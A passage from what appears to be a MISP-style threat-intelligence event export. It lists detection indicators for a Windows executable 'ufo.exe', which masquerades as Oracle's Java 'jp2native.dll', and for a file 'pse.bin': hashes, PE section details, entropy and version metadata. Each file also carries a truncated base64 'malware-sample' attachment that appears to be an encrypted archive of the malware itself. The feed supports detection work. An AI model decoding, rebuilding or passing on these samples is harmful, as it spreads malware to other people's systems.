"to_ids": true,
"type": "sha1",
"uuid": "62471cbc-61e2-45d1-aefa-6f9d3d4c243f",
"value": "8c280ae153325f85cd4a869f8116e9e3df0dc812"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1594843470",
"to_ids": true,
"type": "sha256",
"uuid": "f352baed-150a-4ff4-8745-0c274900bf0a",
"value": "69aff97d63b9f106ab4b318358d260968629056e693f19f01e5001d023fb1f86"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1594843483",
"to_ids": true,
"type": "sha512",
"uuid": "57726d99-3ff8-4331-9c22-fb9cc3c30762",
"value": "6f52b4198600889d50961a88446854ab1e7dd877c2c91f2a39a3052b4059e2ff31ae6ac9a82d5777e4fe84d18598abcd0200b1f3e4449e34b9c1d191935d57b8"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1594843496",
"to_ids": true,
"type": "ssdeep",
"uuid": "26d752ad-7355-4070-8ccd-b09642a166c1",
"value": "12:E71i3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:TA1YFSlel1NzHN/m93Jl/KPN3ND"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1594843510",
"uuid": "65b78289-00e3-405f-a669-e21c4b240aff",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1594843510",
"to_ids": false,
"type": "text",
"uuid": "f3c0c1bf-c85a-4ba4-99a5-0373d70552cc",
"value": ".reloc"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1594843510",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "33f360e2-e3f4-4474-9fa2-fe385c72ac96",
"value": "4096"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1594843510",
"to_ids": false,
"type": "float",
"uuid": "965fd0bc-6b1c-418d-9c6a-419cb3ea8ad8",
"value": "5.8403314710145"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1594843510",
"to_ids": true,
"type": "md5",
"uuid": "68d5f823-7a9f-4c5e-9ee5-59326f0edc3e",
"value": "1b5b73978c9dd2b41ffb6503bbce8fa5"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1594843524",
"to_ids": true,
"type": "sha1",
"uuid": "7d949797-4652-4952-837c-fdb19b0654d8",
"value": "8902587665c7be53c1803817feebd8982a1fce88"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1594843537",
"to_ids": true,
"type": "sha256",
"uuid": "de7fa0ae-9b23-466f-b477-e2061ffca952",
"value": "4de7524bab0b1ee28e73af784430877e43359840645dd5382d9387f758a710c1"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1594843549",
"to_ids": true,
"type": "sha512",
"uuid": "13d0a6df-7d20-44c6-8289-475d62e967a6",
"value": "c9c576f04fe09bfea4e965418cf08009a4f41f3d29529ece5827ebf6f66b1a879211ca4e7e8e046cde9238bb09ebba817dd5ec92f1442483ef613c062e6a79fa"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1594843564",
"to_ids": true,
"type": "ssdeep",
"uuid": "60b6d300-9272-4596-a355-fd46e2f39e51",
"value": "12:/qtWjpmzSlZzY1zwkUdU0UX0rojXU84jv:/qkQ2lZzY1zwDCfjX3cv"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a Portable Executable",
"meta-category": "file",
"name": "pe",
"template_uuid": "cf7adecc-d4f0-4e88-9d90-f978ee151a07",
"template_version": "5",
"timestamp": "1594843747",
"uuid": "aec61910-1c29-47c5-88c9-37621ded62dd",
"ObjectReference": [
{
"comment": "Section 0 of PE",
"object_uuid": "aec61910-1c29-47c5-88c9-37621ded62dd",
"referenced_uuid": "0537282b-b524-441b-bc04-7b894b342a40",
"relationship_type": "includes",
"timestamp": "1594843747",
"uuid": "b8dc8739-ee39-48c9-97a7-a73397ff73f9"
},
{
"comment": "Section 1 of PE",
"object_uuid": "aec61910-1c29-47c5-88c9-37621ded62dd",
"referenced_uuid": "856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6",
"relationship_type": "includes",
"timestamp": "1594843747",
"uuid": "5b689355-cfc5-43f1-9059-6741e9063595"
},
{
"comment": "Section 2 of PE",
"object_uuid": "aec61910-1c29-47c5-88c9-37621ded62dd",
"referenced_uuid": "f5deb688-77b3-4f0b-b997-0692d1966239",
"relationship_type": "includes",
"timestamp": "1594843747",
"uuid": "dba66821-7f74-4590-afd8-025565253c4f"
},
{
"comment": "Section 3 of PE",
"object_uuid": "aec61910-1c29-47c5-88c9-37621ded62dd",
"referenced_uuid": "30d4ea8b-bb35-4cc9-aa4d-b95f65834786",
"relationship_type": "includes",
"timestamp": "1594843747",
"uuid": "eb50c511-80fd-4b09-92dd-bf9c36b6943a"
},
{
"comment": "Section 4 of PE",
"object_uuid": "aec61910-1c29-47c5-88c9-37621ded62dd",
"referenced_uuid": "65b78289-00e3-405f-a669-e21c4b240aff",
"relationship_type": "includes",
"timestamp": "1594843747",
"uuid": "677a0c69-b2c0-43c0-8b9c-4de075f20c66"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "type",
"timestamp": "1594843590",
"to_ids": false,
"type": "text",
"uuid": "e832916a-33d1-4310-976f-79ba254e2fc3",
"value": "exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entrypoint-address",
"timestamp": "1594843600",
"to_ids": false,
"type": "text",
"uuid": "bb331e90-a994-4ed5-96e1-c639ff65c6ef",
"value": "268451982"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "compilation-timestamp",
"timestamp": "1594843611",
"to_ids": false,
"type": "datetime",
"uuid": "24cbc328-967a-4597-8a64-400aa261cbfd",
"value": "2020-07-15T23:22:28+00:00"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "original-filename",
"timestamp": "1594843623",
"to_ids": true,
"type": "filename",
"uuid": "1ca453b1-ff35-4bb6-a5de-43279baa60d3",
"value": "jp2native.dll"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "internal-filename",
"timestamp": "1594843633",
"to_ids": true,
"type": "filename",
"uuid": "a0cbdd21-a9c2-4413-9b54-2a809864e90b",
"value": "jp2native"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "file-description",
"timestamp": "1594843636",
"to_ids": false,
"type": "text",
"uuid": "2bf624a7-fc37-4dc6-98e7-9fec75fdcb48",
"value": "Java(TM) Platform SE binary"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "file-version",
"timestamp": "1594843636",
"to_ids": false,
"type": "text",
"uuid": "19ec0651-842f-4cd7-abcf-5ae67023ccb3",
"value": "11.172.2.11"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "lang-id",
"timestamp": "1594843636",
"to_ids": false,
"type": "text",
"uuid": "c747a4cc-2f45-40e7-b1ec-bfbef7d3a91a",
"value": "040904e4"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "product-name",
"timestamp": "1594843636",
"to_ids": false,
"type": "text",
"uuid": "ba4d8526-53f3-41b1-a202-7c3ddfade32c",
"value": "Java(TM) Platform SE 8 U172"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "product-version",
"timestamp": "1594843636",
"to_ids": false,
"type": "text",
"uuid": "586ad760-bc1a-486c-87e5-91704c6ae8b0",
"value": "8.0.1720.11"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "company-name",
"timestamp": "1594843636",
"to_ids": false,
"type": "text",
"uuid": "76aa611f-70c0-4450-98bc-3a9299675859",
"value": "Oracle Corporation"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "legal-copyright",
"timestamp": "1594843636",
"to_ids": false,
"type": "text",
"uuid": "91456d5a-2383-47d6-9f99-3ff96d2b9f6d",
"value": "Copyright \u00c2\u00a9 2018"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "number-sections",
"timestamp": "1594843648",
"to_ids": false,
"type": "counter",
"uuid": "d708fd04-9ff4-49a3-961a-f83102c73069",
"value": "5"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "20",
"timestamp": "1594843747",
"uuid": "be484895-ebf6-4a2d-b492-e8810cd8f793",
"ObjectReference": [
{
"comment": "PE indicators",
"object_uuid": "be484895-ebf6-4a2d-b492-e8810cd8f793",
"referenced_uuid": "aec61910-1c29-47c5-88c9-37621ded62dd",
"relationship_type": "includes",
"timestamp": "1594843747",
"uuid": "cdafa3af-8353-44e7-921b-a0a64495b6b4"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "filename",
"timestamp": "1594843653",
"to_ids": true,
"type": "filename",
"uuid": "f65e1be7-a2db-43a7-898f-7f112cdb75be",
"value": "ufo.exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1594843655",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "6ae89fa3-dbd8-4930-95e7-2ad86e794b56",
"value": "217088"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1594843655",
"to_ids": false,
"type": "float",
"uuid": "273811fa-d516-496e-a5aa-b8316172db00",
"value": "7.6525710736034"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1594843655",
"to_ids": true,
"type": "md5",
"uuid": "4fcdb90b-0ba7-4ef8-8cfe-674ae12d9c81",
"value": "92cc8b22a89cc560963407b482443b76"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1594843668",
"to_ids": true,
"type": "sha1",
"uuid": "153e7873-793a-4e69-ab9b-48ae9baf91b0",
"value": "8b0c0b84222571a70ca65c0e3e8cf459c80406fc"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1594843681",
"to_ids": true,
"type": "sha256",
"uuid": "7372d73f-1b96-4a8c-8219-0f3d2630110d",
"value": "5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1594843695",
"to_ids": true,
"type": "sha512",
"uuid": "85089b4c-4c95-41bd-86a0-70711b015fc6",
"value": "2246f494a57b0cb1623c7eb0c7dc11ca8424ad166c99cf87c7528e425167297266cf7fe56d342756560d4e5de9b1ab2d989527b0581b79edf910519cbb973475"
},
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1594843708",
"to_ids": true,
"type": "malware-sample",
"uuid": "fdbbca6a-a9e8-4089-bc37-f5a7a12c51fa",
"value": "ufo.exe|92cc8b22a89cc560963407b482443b76"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "mimetype",
"timestamp": "1594843733",
"to_ids": false,
"type": "mime-type",
"uuid": "3686f4de-e348-40e2-b66a-fe1eeafa49e5",
"value": "application/x-dosexec"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1594843733",
"to_ids": true,
"type": "ssdeep",
"uuid": "b45ade6e-dd09-4b7b-96cb-0bcd2b6e1752",
"value": "3072:toADcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESenxxgSrYGRQJSwrruPK:qA26hB5gBZ74XQN99enxxgShRW6i"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "20",
"timestamp": "1595185566",
"uuid": "46037d3e-727a-4508-8dcb-d10de58a764f",
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "filename",
"timestamp": "1595185470",
"to_ids": true,
"type": "filename",
"uuid": "30455024-c205-4084-93b1-50b4cb0345f9",
"value": "pse.bin"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1595185470",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "d40e61ad-2180-4b3e-99c1-7506a8a4deed",
"value": "280078"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1595185470",
"to_ids": false,
"type": "float",
"uuid": "3896b1dd-fcd9-423d-827c-7ab1990590c9",
"value": "0.96865136655866"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1595185470",
"to_ids": true,
"type": "md5",
"uuid": "6eef596e-184c-49f2-9a0c-7545c321cb9c",
"value": "dfb1fd17182503b2f15fbf6c5c30ff71"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1595185483",
"to_ids": true,
"type": "sha1",
"uuid": "dd9e36e5-ff93-4229-83ff-e245c6f6784b",
"value": "4bc94298f3b7a33768718ea309f9223d3aef3250"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1595185495",
"to_ids": true,
"type": "sha256",
"uuid": "3480af1d-7baf-4314-b3e4-46f535e9c2bc",
"value": "1e4cdfc57086203dce60611c3a7397399199962dc4bd4fa984b0ff0a27f8c3a9"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1595185510",
"to_ids": true,
"type": "sha512",
"uuid": "830dbc4a-5c44-4ab2-82fa-300e46cb6d4c",
"value": "58a340497a5d8c5f2531ba67c6e2eef63768cd7cfff5cd72bbc23104f3e98ceb676e0ce369b7310f43a42aba08884bee26797cf79f1d56d38d11922f6d18ab05"
},
{
"category": "Payload delivery",
"comment": "",
"data": "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